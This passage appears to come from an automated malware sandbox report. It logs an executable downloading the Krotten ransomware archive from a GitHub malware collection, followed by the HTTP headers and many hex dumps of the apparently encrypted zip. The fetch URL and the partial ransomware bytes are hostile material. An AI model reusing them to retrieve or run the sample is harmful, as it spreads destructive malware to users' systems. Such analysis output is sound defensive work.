74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.449721185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:15 UTC1153OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:15 UTC1153INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 26359
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:15 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6949-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455515.030267,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 705de1d5d05472a8195f2e448e4c193509b824a0
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:15 GMT
                                                                                                        Source-Age: 43
                                                                                                        2022-09-29 12:45:15 UTC1153INData Raw: 50 4b 03 04 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 51 1f 85 1c 8b 3e 2c 09 fa d6 8a ea d4 7d 01 2f 41 8d 8b 07 f0 fd bb 72 93 3d 0e ed 40 4e 7a 13 95 d4 dd 52 47 43 5a fe 98 0e 0e 17 7b 8d 0b 48 2a e1 a6 38 9c 0d 69 c0 a2 4e b7 13 22 57 2e 2b 04 a2 0e 40 b8 3b 45 f0 af 7f 66 fa c6 fd 85 22 c0 6c 99 74 ef 66 9e f4 72 6a d9 dc 4d 40 bf 11 c6 56 7f 5a ef ee 2f ee 69 5e 5a 83 44 c1 e1 ac 9e 0d 4a 58 19 bc d5 4a ed 6d 0f 35 24 46 b4 51 93 93 a8 4a d0 a7 d9 78 fe 72 46 e5 ea dd ae 9f d1 96 48 23 2c 3a 7f d8 74 27 ef d1 37 1b d5 be bd 4a 4b 51 4a c2 83 3d a5 d6 81 75 5c f0 dc 4d 2c f1 64 1c 28 3c 89 b5 e7 cd 2c 29 bf 64 4a f0
                                                                                                        Data Ascii: PK3c8/f)Endermanch@Krotten.exeAEQ>,}/Ar=@NzRGCZ{H*8iN"W.+@;Ef"ltfrjM@VZ/i^ZDJXJm5$FQJxrFH#,:t'7JKQJ=u\M,d(<,)dJ
                                                                                                        2022-09-29 12:45:15 UTC1155INData Raw: 7e 07 d3 91 36 cc 6c 5d e7 86 c4 bb 68 42 cb 46 fd 3d 53 ef 9a 53 c0 07 a2 a2 fb 2d 2a 97 b1 11 17 27 a3 e2 cd e6 8b 85 1d b8 5e 1d 76 5f f8 48 bb 13 ea 13 88 ed e9 39 9b e4 4f 1d 5b 57 77 14 89 a3 33 0d cd 2d 1c a3 b3 8f 4a fb 61 14 c1 c0 39 92 61 fb ba ad 73 31 0e 78 fb 55 f8 ea e5 36 47 f5 37 b6 48 f6 3b 4f 2f 13 bc 87 5e bb f9 a8 84 93 8b 7f aa e9 ba c2 df 48 f0 a1 09 4c f2 2b c0 26 c3 ec ad 2b 27 48 54 35 3e e4 a1 2f 4a f1 e5 3e 63 45 93 59 ee c1 17 10 cf b7 0a 01 bb 2f 3e 40 e2 96 e7 96 1a 65 42 0d b5 43 d2 26 07 82 cd df 4d 59 00 b3 27 c4 5b 05 2d ba 78 12 48 47 84 96 1e 22 12 c6 b7 9a da 78 5f 2a 58 63 aa ab 3e 4c 26 88 77 b3 73 e9 78 ad 2e 31 a3 8d 09 c2 64 6e 25 01 35 42 06 f8 72 fb 72 b0 c2 ea 64 0b a0 18 d6 f5 0e 30 3d a2 29 67 9c d9 e2 58 45
                                                                                                        Data Ascii: ~6l]hBF=SS-*'^v_H9O[Ww3-Ja9as1xU6G7H;O/^HL+&+'HT5>/J>cEY/>@eBC&MY'[-xHG"x_*Xc>L&wsx.1dn%5Brrd0=)gXE
                                                                                                        2022-09-29 12:45:15 UTC1156INData Raw: ae 9b f4 c8 3e 7a 74 41 7b b8 2e ef b9 95 a5 e1 52 93 e0 18 af 7b b9 ea ba 7b 09 b8 17 56 3d a0 ca 02 f9 9b 23 a6 23 9e 8c 82 2a 51 2d ae fa eb 89 45 7d 46 5a 53 57 b8 c1 6d 3e 2f e7 2c 0f 04 0a 5b 12 53 71 4f 7d 32 3a 8f 94 81 58 12 b4 7e de 48 b5 d8 5e 26 a8 29 8c f2 e7 dd 9e 5c 9b 12 97 03 2f a5 aa ae a6 44 c9 8c 27 5e 3d 44 7f 98 c1 7d b7 eb 24 f4 de 5c bb b7 0e 9a 9b 9b 01 dd 79 93 79 ed 98 38 ee 61 5f aa fe bb 18 d8 3d 45 53 62 54 d1 13 69 5f 7e 2b 69 18 e8 13 16 e4 87 29 83 8f 25 c0 a9 31 16 a8 65 7f 4c 60 16 f1 7e f1 84 12 21 9c eb 16 48 d2 71 8e 2d 24 2e 5b 04 a5 15 05 54 ed 5a 03 e5 b6 e8 b5 fb ab b6 69 c6 44 53 36 d5 c4 68 3c 7c 15 85 3c ef 6d 35 c6 12 10 a5 a8 c2 57 32 ac eb 19 32 2a dd 65 ad ef ab 60 5c 7e a3 75 bb c1 75 12 5b 8a e6 78 62 14
                                                                                                        Data Ascii: >ztA{.R{{V=##*Q-E}FZSWm>/,[SqO}2:X~H^&)\/D'^=D}$\yy8a_=ESbTi_~+i)%1eL`~!Hq-$.[TZiDS6h<|<m5W22*e`\~uu[xb
                                                                                                        2022-09-29 12:45:15 UTC1157INData Raw: 63 53 b5 5a bd a6 44 ed d9 02 99 fd 6d 6d ab 31 2c 4d bc f8 f9 95 69 f6 43 4b 13 52 40 19 68 1c b0 8c e2 5a 3a f6 88 cc c7 c6 c8 71 72 db 85 65 79 a0 88 1c 80 52 78 5b 2d dd 51 d6 7f 1d 38 2d d3 5b 59 42 3b f4 13 9d 5c 5d 72 ae 9d eb 83 7c 49 15 9f a8 14 1b 11 da 86 cb a4 f9 88 40 ac dc 36 33 46 30 9a 6e a6 77 18 db 85 67 b2 59 0d a1 be 95 ac 10 10 a4 b7 18 9d e1 0a c5 f8 66 34 91 d0 be f5 c7 25 79 26 b6 65 28 29 29 99 e4 46 c4 88 3e ce 9c 57 ff 55 a8 80 fe 7f fd 7c 98 22 2b 0c 6f d1 cc 8f ec 1c 6c fc c5 e7 86 f8 30 94 c8 d2 bd 71 93 63 53 1c 20 5d 85 ed dc 9f 63 68 db 93 bc 04 40 b0 b5 3c 33 54 17 f8 ea 5c 74 6a 62 3b ab a2 30 36 df 5a 6b df 31 b7 c3 7e 60 ae e4 11 7c d3 d6 8b 46 b1 b7 39 f1 8e 30 4f 4f 1d fa 7a e1 0b 66 74 50 05 fe 6c a9 34 e8 2d 6a 5d
                                                                                                        Data Ascii: cSZDmm1,MiCKR@hZ:qreyRx[-Q8-[YB;\]r|I@63F0nwgYf4%y&e())F>WU|"+ol0qcS ]ch@<3T\tjb;06Zk1~`|F90OOzftPl4-j]
                                                                                                        2022-09-29 12:45:15 UTC1159INData Raw: f5 a8 e8 97 c4 0b fe 16 47 d3 16 f6 3a 4f 3b 1c d2 7e 95 8d 8e 11 45 2a 99 15 52 4a c4 71 73 a9 d6 e3 4e 2b a9 78 b3 c5 19 0f ea da 8c 7e e2 e1 75 2e cb e0 4a 03 90 4e 4a a3 9c be 32 22 b2 b8 14 8d fb 10 64 57 4e ae 9f ad 68 fc 78 f9 ca 1f b6 91 ca 2f 0f 5c a4 0c 9a cf 28 74 c9 b8 bb 29 06 db 9a 57 ae 02 18 e5 2b 4f 1c 67 68 f0 5c ee 75 50 2a ee 4a 88 f8 d1 d1 53 8d 23 83 b5 dd 06 61 05 0c 53 e3 a8 92 b2 87 61 f8 f7 c4 58 44 f9 ab 63 b8 2f 84 4d e1 96 55 0f 91 a9 93 5b 57 24 8b dc 32 55 7c 58 b9 04 7a 1a e7 e3 05 2a c1 4b 10 92 2b 70 49 49 5f 46 d1 49 8e c0 61 47 58 4a f1 10 2a 27 a2 e8 1c 68 f9 72 8d 98 93 a8 78 65 8e c1 d5 3f d1 95 f9 16 a0 50 ba a0 f1 dd 58 fd 1c 2a 0d 08 94 13 2f 00 2e 59 f8 17 f2 b3 d2 6c dd 48 6c 60 0e f7 69 40 4f a8 a3 6a a2 ea 2c
                                                                                                        Data Ascii: G:O;~E*RJqsN+x~u.JNJ2"dWNhx/\(t)W+Ogh\uP*JS#aSaXDc/MU[W$2U|Xz*K+pII_FIaGXJ*'hrxe?PX*/.YlHl`i@Oj,
                                                                                                        2022-09-29 12:45:15 UTC1160INData Raw: ba 77 e6 2f d6 40 2b 3a c1 10 19 77 c3 68 7f d4 d8 45 87 3c d6 57 f7 ec 4a d5 22 af 4e f8 57 c0 27 85 f5 df 71 1b b8 86 72 f0 d7 e8 69 db 35 76 2f ab ad 22 d7 be 42 85 02 6e 01 ac 30 c4 0b e7 a3 fa ef b1 e9 08 b9 a1 2d 2d 1b e7 18 57 f9 cc 25 5d 9b 96 81 bc 22 13 0a db 67 3d 05 e2 85 0b 4b 29 b6 7d 64 33 99 b2 71 e0 33 ba 56 7a ef 26 80 3c dd b1 b1 d3 cc d8 20 b7 3c 7e 97 e3 c1 ed a9 aa a0 fa d7 7f fc b0 2a 94 79 29 28 fa 3a a7 85 7d 7e f8 3d 2d ee 4e 1a 51 20 c6 22 75 56 77 ef e2 62 e0 05 7f 4c 66 b1 bf eb 6b 33 fe 39 e9 7e e3 eb 62 ce db 96 59 34 96 ac 7e 89 af 4c 57 a4 57 89 bb b0 cb 2a b8 35 e8 1f 37 68 b9 3a 91 80 aa be de f9 e4 67 8a a8 01 7a c4 81 7f cc 63 47 60 d5 20 10 bb ae c6 30 98 bc b1 e6 0e 64 60 62 63 a0 ee 94 f9 97 77 52 da dd 0c 2d 6a 6a
                                                                                                        Data Ascii: w/@+:whE<WJ"NW'qri5v/"Bn0--W%]"g=K)}d3q3Vz&< <~*y)(:}~=-NQ "uVwbLfk39~bY4~LWW*57h:gzcG` 0d`bcwR-jj
                                                                                                        2022-09-29 12:45:15 UTC1162INData Raw: e6 9c df 45 c9 81 e1 73 37 b0 b9 ee bf 4e 78 de ca cb 4c 4e cc e7 5d 75 ee 15 e9 94 8a 0d 0e 8a 83 83 7e 52 a2 17 35 f7 ff 3d 12 48 9e 38 cb 3c 1c d7 36 54 6a b4 c9 6c 2d c7 77 58 2b 60 ef 2d 09 43 26 d1 2f 6c b3 70 b3 d7 e5 7c 72 40 35 41 62 fd 85 d5 b8 5e ca 49 ff 22 eb cc 42 47 7d 91 08 5b 76 37 2a a7 c5 0d ff 9a a5 10 0c e6 6e e9 e5 b4 80 4c f5 32 cc b1 89 1c e8 72 fa b3 2a 7f 4c fc da 58 ae 76 51 6d a3 09 71 26 ff b2 a6 f4 bc 77 77 92 27 3d c2 64 9b 0d 0e be bc 21 54 6e 9c 7d 0c 93 3f 39 e9 0f 86 9c 08 87 6e b5 33 8a 1c d9 f7 44 1f 16 40 3e 22 fb a1 84 97 d5 c7 fb 11 c7 a7 07 9f ad b4 97 5c 4d bc 58 dc 0b 0c c8 a7 7c 1b d4 aa 61 56 78 81 78 94 e6 84 9d 1a 7a b8 2e fe 9f ab 08 a2 fe f6 2d 53 ee 45 34 40 b7 59 ee c8 f2 6a ae cc cb ad d7 28 70 08 01 77
                                                                                                        Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp|r@5Ab^I"BG}[v7*nL2r*LXvQmq&ww'=d!Tn}?9n3D@>"\MX|aVxxz.-SE4@Yj(pw
                                                                                                        2022-09-29 12:45:15 UTC1163INData Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3
                                                                                                        Data Ascii: ;@;;rN?D<S*(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M*#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
                                                                                                        2022-09-29 12:45:15 UTC1164INData Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d
                                                                                                        Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-|[H|&'x**)B"/|vt9\4ur0Gne#
                                                                                                        2022-09-29 12:45:15 UTC1166INData Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c
                                                                                                        Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
                                                                                                        2022-09-29 12:45:15 UTC1167INData Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a
                                                                                                        Data Ascii: wX51<lp-RY?2 )>d~Za-1f My|R=LZ%rcg|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
                                                                                                        2022-09-29 12:45:15 UTC1168INData Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b
                                                                                                        Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>|Y_3g(q ,jhw8vr@\qB#G56YyVd'S|L*K7KPAPMb[SaHCj^Goa=[X+E|Z@_]O=19bo+u0-p"!U}K
                                                                                                        2022-09-29 12:45:15 UTC1169INData Raw: 89 4f 0e 02 30 8e 80 58 34 85 06 20 67 88 7a 4a 60 ca 65 1f 4a d8 fc 72 0c 7e 6d 05 1b e6 95 51 87 a3 00 48 ea 75 49 f2 20 59 3b 74 55 08 be e1 b4 90 82 8d d2 6d 2b 50 02 f8 12 c4 5d 62 44 23 be a5 01 03 31 ac 33 53 68 bd 4d e1 66 c1 cc b6 95 16 c5 1f dc 49 61 02 aa e5 aa 82 d4 e6 59 8e c1 cc 54 90 c6 be d7 0a 0c 2f 6a e7 98 31 23 fc 36 83 21 a8 e4 31 ea eb c7 42 47 03 bb 62 db 44 d2 e7 6d 8f 1f 52 fc 20 a8 a0 1d 00 ae 69 03 90 e9 88 d6 f3 52 4f a7 3c f3 22 6f e4 a0 94 1c 08 d4 bb 00 5e d6 2e e5 ab 8e d6 04 d1 24 95 2d 51 49 97 5b 19 3a d7 c0 2f 33 fe 25 23 5c a3 2a bb 20 cb d5 ea 09 ca 48 b0 25 04 c0 18 f7 e6 b5 17 35 9e 40 a9 63 8c 00 cf f5 d5 c0 2b 87 b4 5f 72 4f 0a 62 4c c6 cf 7c 71 bf 5c 88 0d ae 14 25 04 24 7b 55 91 b7 44 67 fc 75 6b 08 d3 4a b6 43
                                                                                                        Data Ascii: O0X4 gzJ`eJr~mQHuI Y;tUm+P]bD#13ShMfIaYT/j1#6!1BGbDmR iRO<"o^.$-QI[:/3%#\* H%5@c+_rObL|q\%${UDgukJC
                                                                                                        2022-09-29 12:45:15 UTC1170INData Raw: dd c7 f0 a9 f7 87 06 13 35 ad c2 9b 66 ed 16 a6 ad c9 76 77 ec 46 64 1f 00 4d 8a ca 25 d1 f2 af 47 e2 f1 63 2a 75 ed af 71 73 4d 75 d6 f9 77 7c 22 28 26 44 91 86 9d fd 1b db 54 26 8c d7 22 e5 a6 f9 b6 7c 66 09 0f 76 27 ae fc 3b 6b c2 f0 61 52 54 3a af cf 86 4d 02 b3 69 17 0e 4f 5b 15 2d b6 dd d6 67 75 2d f1 28 f1 b1 fb bd a0 8e 23 8d 5f 1c f0 fa e2 82 a0 db 70 56 7a 3b 54 e5 cf b5 ad b3 eb 37 5e b6 79 b6 a7 e2 19 2a 14 0f 1b 19 14 8b 8c d4 1b 6b 34 6a 67 51 95 50 58 09 ef 5f 36 c7 0b d5 e5 9d 76 f7 5a d2 f7 4a 24 51 d4 0c 0d e7 e5 6b 60 46 65 8a a6 b4 a1 0b 31 a7 2b b3 2d 9d a1 ab 3f c6 75 15 e8 1d 39 b8 07 85 42 c8 5b 8b 78 95 73 d8 9f 8b 86 dc fc 72 28 4d d1 e8 c0 1f ff a7 8e bc 6d 2a 9c 75 47 ef 9f d3 a2 15 5a 4b 91 7a 99 a9 dd 58 f5 ef 3e f9 f5 a4 08
                                                                                                        Data Ascii: 5fvwFdM%Gc*uqsMuw|"(&DT&"|fv';kaRT:MiO[-gu-(#_pVz;T7^y*k4jgQPX_6vZJ$Qk`Fe1+-?u9B[xsr(Mm*uGZKzX>
                                                                                                        2022-09-29 12:45:15 UTC1171INData Raw: 2c 43 dd be a8 19 69 ac fd 36 14 dd 41 cb de d8 c2 e4 8d 17 03 85 be 1e 44 84 98 f2 b3 06 cb 2e 88 77 34 ca 41 f3 83 c8 4c d0 1b 63 73 00 99 ff 6a fa d4 0d 72 de 4a b2 41 e0 c3 88 c5 2a 48 ce 28 d4 3a 7f 17 38 06 41 e4 0e 23 01 b1 18 43 06 39 b5 8b d2 74 4c 4d 3e da 3a f0 25 65 13 0e 18 ab b9 b0 bc 7f 0f d4 d3 cd 67 65 c6 9e cf 52 40 82 35 37 cf cb 28 dd 28 e2 e0 b1 d9 1f 77 03 c2 76 d0 de 31 ba a6 89 2e 71 cc ce 75 33 3b 80 f3 e8 2c ef 1c e0 d3 db 88 23 e1 b7 99 1d 45 9d 1f 26 f3 3f 6c 95 79 b1 85 85 e2 b7 95 17 7b c5 39 8a aa 48 3b 6b dc bb 8f 23 ac 9d 86 cb 97 2a 40 8f 48 0e 42 c3 82 36 19 7c 4e e3 b2 9f 51 7c 2c bf 18 0a 99 0a 33 99 99 13 84 7e 2b 86 f8 26 42 1b 72 9b 0c b6 d0 6d 29 55 b4 63 16 cf 06 87 75 10 31 2b e5 ba af d1 2e ec c8 ce 8b ab dc 96
                                                                                                        Data Ascii: ,Ci6AD.w4ALcsjrJA*H(:8A#C9tLM>:%egeR@57((wv1.qu3;,#E&?ly{9H;k#*@HB6|NQ|,3~+&Brm)Ucu1+.
                                                                                                        2022-09-29 12:45:15 UTC1173INData Raw: f3 4c 99 98 b5 a9 f4 43 30 44 22 4d 41 9a fb 99 7a 03 7e d7 83 68 ed 8d 50 e0 d1 af 66 a8 0a 65 99 44 4c 1b 94 e4 d1 35 71 c0 0c 16 1c 19 33 d9 af be 3a fb 99 ba 96 de ba 1e bd fe d1 b9 1e f3 b5 08 b3 a2 ac 5d 61 06 84 b3 47 5d c8 f3 d9 12 e1 1f 62 f2 7f ee d5 e7 d9 58 e6 63 5e b8 6c ed f0 0f b0 a9 f4 bf 77 c8 54 b1 f9 26 3a 73 01 8c bc 48 87 9c 31 47 b9 1a 3c b8 61 18 bc 13 c9 f6 a6 fb 56 2d 77 4c b8 a0 26 33 65 42 d4 9c c2 57 f6 dc 18 8f 02 d2 89 0b 2f bf 70 db 58 2f 89 8d 10 7c e4 19 9f 66 8b 2c 86 48 77 ab 66 55 db b5 61 7c ba 51 87 10 76 0b b4 82 2a 38 d2 ed 0d 33 1e e6 2f f3 2f 91 28 63 1d 36 68 96 e5 e9 b9 34 83 ba 4a 4b 0e 9b fe c8 11 f6 ca 90 72 fc 99 b7 47 57 5a 02 0a 2d 62 ab de 88 46 be 43 25 92 c7 c9 c0 6b e4 cd 16 1e da 3d a6 66 57 0f 82 41
                                                                                                        Data Ascii: LC0D"MAz~hPfeDL5q3:]aG]bXc^lwT&:sH1G<aV-wL&3eBW/pX/|f,HwfUa|Qv*83//(c6h4JKrGWZ-bFC%k=fWA
                                                                                                        2022-09-29 12:45:15 UTC1174INData Raw: 42 4b cd 96 a8 d6 09 13 d9 09 1e 0f 37 cd 18 fd 12 66 bb 91 60 de d4 4f 69 62 1d 08 88 33 24 97 9b b1 18 8b 52 4c 8f 20 fd d1 95 cf d4 a3 3f bd 8d ae 2e 24 c5 f8 ab 9c fe 64 d1 88 a4 90 38 94 d6 e5 34 d5 a9 af 25 ab ea 70 72 74 12 2a b5 1e 65 cb a2 79 43 d4 2d 71 5a a2 b6 39 8c 01 29 5e b8 10 79 e1 2a 5e de 87 4c 63 f5 c7 43 f3 ce 4d 57 e2 9b ee 04 3d cb 0c 39 ee cf c9 90 18 f7 7e 4f b2 88 d1 c3 0c fc 14 e3 d4 87 e2 b7 0a f8 c1 a3 5f 3d 42 5e d9 14 4b f9 d5 b3 06 7b 10 42 15 fa ce ce 5c e6 58 8a b6 4a ec 06 b1 86 31 0f 0a d1 e4 60 c5 31 7a 4d d7 5a 27 56 64 90 0d 61 ae 82 a5 46 f7 54 10 d4 a1 32 20 0c 1e 97 75 e6 47 59 ae 66 b4 d3 9e 71 97 51 67 c1 a9 6c e8 0e 2c ea 0f ce f2 2b c2 37 f6 e8 56 6c d4 54 16 88 0b da 8c cc 62 6a 8d 07 4e 7b 2b d1 eb fe bd 35
                                                                                                        Data Ascii: BK7f`Oib3$RL ?.$d84%prt*eyC-qZ9)^y*^LcCMW=9~O_=B^K{B\XJ1`1zMZ'VdaFT2 uGYfqQgl,+7VlTbjN{+5
                                                                                                        2022-09-29 12:45:15 UTC1175INData Raw: 49 30 4f 0c 42 80 b7 f7 19 9d be cc 46 67 7f b2 65 f9 08 7e 0e 18 7d 8d 31 0a 50 d3 2a 7a 72 40 3e a1 84 71 fe 44 6d 96 e0 79 79 49 23 40 1f 12 38 77 7a 90 66 b8 a5 f0 f6 b6 f1 99 8d 40 ce 58 c3 ab 6f 96 d3 4a a8 c2 fa 8e 23 9d e4 6c 1c 96 bd bc f5 8a 42 99 b7 d8 1e 53 64 14 a9 c0 de af 43 b8 0c 30 d1 e8 e7 24 71 f4 85 04 a7 96 2e 34 23 d3 49 ce 85 b6 8b 68 08 3d 0f 58 8d ac 88 7d d1 50 d6 ee d1 39 e7 33 d3 dc 4a 32 7f 44 cb 26 56 09 57 56 49 c6 e6 c7 78 25 5e a1 3d 29 95 05 ce 74 f9 73 23 41 35 a2 c4 e3 ad e1 c6 6b dd 46 b4 89 95 33 9f a9 72 fa 8e d4 41 8e 55 b4 f9 6f 4f 71 c3 c0 97 88 1b 31 2e a1 62 ec ac 7f fc f0 33 06 8e 13 d0 6c 84 92 a1 69 d1 ba 31 2d ff 3c 89 17 19 25 ce a1 c6 1a 70 ed 9d 9b 6d e3 68 cd 49 f0 db 43 15 5f ab 55 9a fb 6b 65 3d 86 1b
                                                                                                        Data Ascii: I0OBFge~}1P*zr@>qDmyyI#@8wzf@XoJ#lBSdC0$q.4#Ih=X}P93J2D&VWVIx%^=)ts#A5kF3rAUoOq1.b3li1-<%pmhIC_Uke=
